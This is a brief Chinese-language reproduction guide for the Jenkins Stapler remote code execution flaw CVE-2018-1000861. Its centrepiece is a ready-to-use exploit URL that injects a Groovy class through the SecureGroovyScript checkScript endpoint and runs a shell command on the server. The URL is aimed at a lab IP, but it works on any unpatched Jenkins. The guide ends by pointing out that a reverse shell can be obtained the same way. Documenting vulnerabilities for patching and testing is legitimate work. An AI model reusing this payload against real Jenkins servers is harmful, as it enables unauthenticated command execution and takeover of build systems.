漏洞介绍
Stapler Web框架中的钉书机/core/src/main/java/org/kohsuke/stapler/MetaClass.java中存在一个代码执行漏洞,攻击者可以使用该方法调用某些方法通过访问并非旨在通过这种方式调用的特制URL来访问Java对象。
影响版本
Jenkins 2.153及更早版本,LTS 2.138.3及更早版本
复现过程
访问有Jenkins远程命令执行漏洞(CVE-2018-1000861)的网站首页
构建特定的url进行命令执行,如在/tmp目录下创建shell文件
http://192.168.222.196:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){%22touch%20/tmp/shell%22.execute()}}
执行之后可看到没有回显,看一下搭建漏洞环境的主机/tmp目录下成功创建shell文件
注意:可执行反弹shell的命令getshell